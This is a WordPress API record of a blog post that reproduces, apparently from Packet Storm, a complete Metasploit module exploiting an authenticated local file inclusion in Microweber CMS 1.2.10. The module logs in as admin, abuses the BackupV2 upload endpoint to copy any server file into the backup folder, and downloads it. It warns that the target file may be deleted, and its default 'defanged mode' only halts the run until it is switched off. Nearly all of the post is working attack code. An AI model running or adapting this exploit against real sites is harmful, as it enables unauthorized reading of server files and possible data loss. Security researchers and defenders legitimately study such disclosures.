{"id":21023,"date":"2022-02-23T17:58:12","date_gmt":"2022-02-23T14:58:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166122\/microwebercms1210-lfi.rb.txt"},"modified":"2022-02-26T10:05:09","modified_gmt":"2022-02-26T06:35:09","slug":"microweber-cms-1-2-10-local-file-inclusion","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/microweber-cms-1-2-10-local-file-inclusion\/","title":{"rendered":"Microweber CMS 1.2.10 Local File Inclusion"},"content":{"rendered":"

# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated)
\n# Date: 22.02.2022
\n# Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com>
\n# Vendor Homepage: https:\/\/microweber.org\/
\n# Software Link: https:\/\/github.com\/microweber\/microweber\/archive\/refs\/tags\/v1.2.10.zip
\n# Version: Microweber CMS v1.2.10
\n# Tested on: Microweber CMS v1.2.10<\/p>\n

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Auxiliary
\nprepend Msf::Exploit::Remote::AutoCheck
\ninclude Msf::Exploit::Remote::HttpClient<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Microweber CMS v1.2.10 Local File Inclusion (Authenticated)’,
\n‘Description’ => %q{
\nMicroweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
\nUpload function may delete the local file if the web service user has access.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘Talha Karakumru <talhakarakumru[at]gmail.com>’
\n],
\n‘References’ => [
\n[‘URL’, ‘https:\/\/huntr.dev\/bounties\/09218d3f-1f6a-48ae-981c-85e86ad5ed8b\/’]\n],
\n‘Notes’ => {
\n‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
\n‘Reliability’ => [ REPEATABLE_SESSION ],
\n‘Stability’ => [ OS_RESOURCE_LOSS ]\n},
\n‘Targets’ => [
\n[ ‘Microweber v1.2.10’, {} ]\n],
\n‘Privileged’ => true,
\n‘DisclosureDate’ => ‘2022-01-30’
\n)
\n)<\/p>\n

register_options(
\n[
\nOptString.new(‘TARGETURI’, [true, ‘The base path for Microweber’, ‘\/’]),
\nOptString.new(‘USERNAME’, [true, ‘The admin\\’s username for Microweber’]),
\nOptString.new(‘PASSWORD’, [true, ‘The admin\\’s password for Microweber’]),
\nOptString.new(‘LOCAL_FILE_PATH’, [true, ‘The path of the local file.’]),
\nOptBool.new(‘DEFANGED_MODE’, [true, ‘Run in defanged mode’, true])
\n]\n)
\nend<\/p>\n

def check
\nres = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘admin’, ‘login’)
\n})<\/p>\n

if res.nil?
\nfail_with(Failure::Unreachable, ‘Microweber CMS cannot be reached.’)
\nend<\/p>\n

print_status ‘Checking if it\\’s Microweber CMS.’<\/p>\n

if res.code == 200 && !res.body.include?(‘Microweber’)
\nprint_error ‘Microweber CMS has not been detected.’
\nExploit::CheckCode::Safe
\nend<\/p>\n

if res.code != 200
\nfail_with(Failure::Unknown, res.body)
\nend<\/p>\n

print_good ‘Microweber CMS has been detected.’<\/p>\n

return check_version(res.body)
\nend<\/p>\n

def check_version(res_body)
\nprint_status ‘Checking Microweber\\’s version.’<\/p>\n

begin
\nmajor, minor, build = res_body[\/Version:\\s+(\\d+\\.\\d+\\.\\d+)\/].gsub(\/Version:\\s+\/, ”).split(‘.’)
\nversion = Rex::Version.new(“#{major}.#{minor}.#{build}”)
\nrescue NoMethodError, TypeError
\nreturn Exploit::CheckCode::Safe
\nend<\/p>\n

if version == Rex::Version.new(‘1.2.10’)
\nprint_good ‘Microweber version ‘ + version.to_s
\nreturn Exploit::CheckCode::Appears
\nend<\/p>\n

print_error ‘Microweber version ‘ + version.to_s<\/p>\n

if version < Rex::Version.new(‘1.2.10’)
\nprint_warning ‘The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.’
\nreturn Exploit::CheckCode::Unknown
\nend<\/p>\n

return Exploit::CheckCode::Safe
\nend<\/p>\n

def try_login
\nprint_status ‘Trying to log in.’
\nres = send_request_cgi({
\n‘method’ => ‘POST’,
\n‘keep_cookies’ => true,
\n‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘user_login’),
\n‘vars_post’ => {
\n‘username’ => datastore[‘USERNAME’],
\n‘password’ => datastore[‘PASSWORD’],
\n‘lang’ => ”,
\n‘where_to’ => ‘admin_content’
\n}
\n})<\/p>\n

if res.nil?
\nfail_with(Failure::Unreachable, ‘Log in request failed.’)
\nend<\/p>\n

if res.code != 200
\nfail_with(Failure::Unknown, res.body)
\nend<\/p>\n

json_res = res.get_json_document<\/p>\n

if !json_res[‘error’].nil? && json_res[‘error’] == ‘Wrong username or password.’
\nfail_with(Failure::BadConfig, ‘Wrong username or password.’)
\nend<\/p>\n

if !json_res[‘success’].nil? && json_res[‘success’] == ‘You are logged in’
\nprint_good ‘You are logged in.’
\nreturn
\nend<\/p>\n

fail_with(Failure::Unknown, ‘An unknown error occurred.’)
\nend<\/p>\n

def try_upload
\nprint_status ‘Uploading ‘ + datastore[‘LOCAL_FILE_PATH’] + ‘ to the backup folder.’<\/p>\n

referer = ”
\nif !datastore[‘VHOST’].nil? && !datastore[‘VHOST’].empty?
\nreferer = “http#{datastore[‘SSL’] ? ‘s’ : ”}:\/\/#{datastore[‘VHOST’]}\/”
\nelse
\nreferer = full_uri
\nend<\/p>\n

res = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘BackupV2’, ‘upload’),
\n‘vars_get’ => {
\n‘src’ => datastore[‘LOCAL_FILE_PATH’]\n},
\n‘headers’ => {
\n‘Referer’ => referer
\n}
\n})<\/p>\n

if res.nil?
\nfail_with(Failure::Unreachable, ‘Upload request failed.’)
\nend<\/p>\n

if res.code != 200
\nfail_with(Failure::Unknown, res.body)
\nend<\/p>\n

if res.headers[‘Content-Type’] == ‘application\/json’
\njson_res = res.get_json_document<\/p>\n

if json_res[‘success’]\nprint_good json_res[‘success’]\nreturn
\nend<\/p>\n

fail_with(Failure::Unknown, res.body)
\nend<\/p>\n

fail_with(Failure::BadConfig, ‘Either the file cannot be read or the file does not exist.’)
\nend<\/p>\n

def try_download
\nfilename = datastore[‘LOCAL_FILE_PATH’].include?(‘\\\\’) ? datastore[‘LOCAL_FILE_PATH’].split(‘\\\\’)[-1] : datastore[‘LOCAL_FILE_PATH’].split(‘\/’)[-1]\nprint_status ‘Downloading ‘ + filename + ‘ from the backup folder.’<\/p>\n

referer = ”
\nif !datastore[‘VHOST’].nil? && !datastore[‘VHOST’].empty?
\nreferer = “http#{datastore[‘SSL’] ? ‘s’ : ”}:\/\/#{datastore[‘VHOST’]}\/”
\nelse
\nreferer = full_uri
\nend<\/p>\n

res = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘BackupV2’, ‘download’),
\n‘vars_get’ => {
\n‘filename’ => filename
\n},
\n‘headers’ => {
\n‘Referer’ => referer
\n}
\n})<\/p>\n

if res.nil?
\nfail_with(Failure::Unreachable, ‘Download request failed.’)
\nend<\/p>\n

if res.code != 200
\nfail_with(Failure::Unknown, res.body)
\nend<\/p>\n

if res.headers[‘Content-Type’] == ‘application\/json’
\njson_res = res.get_json_document<\/p>\n

if json_res[‘error’]\nfail_with(Failure::Unknown, json_res[‘error’])
\nreturn
\nend
\nend<\/p>\n

print_status res.body
\nend<\/p>\n

def run
\nif datastore[‘DEFANGED_MODE’]\nwarning = <<~EOF
\nTriggering this vulnerability may delete the local file if the web service user has the permission.
\nIf you want to continue, disable the DEFANGED_MODE.
\n=> set DEFANGED_MODE false
\nEOF<\/p>\n

fail_with(Failure::BadConfig, warning)
\nend<\/p>\n

try_login
\ntry_upload
\ntry_download
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated) # Date: 22.02.2022 # Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com> # Vendor Homepage: https:\/\/microweber.org\/ # Software Link: https:\/\/github.com\/microweber\/microweber\/archive\/refs\/tags\/v1.2.10.zip # Version: Microweber CMS v1.2.10 # Tested on: Microweber CMS v1.2.10 ## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21023","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21023","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21023"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21023\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21023"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21023"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21023"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}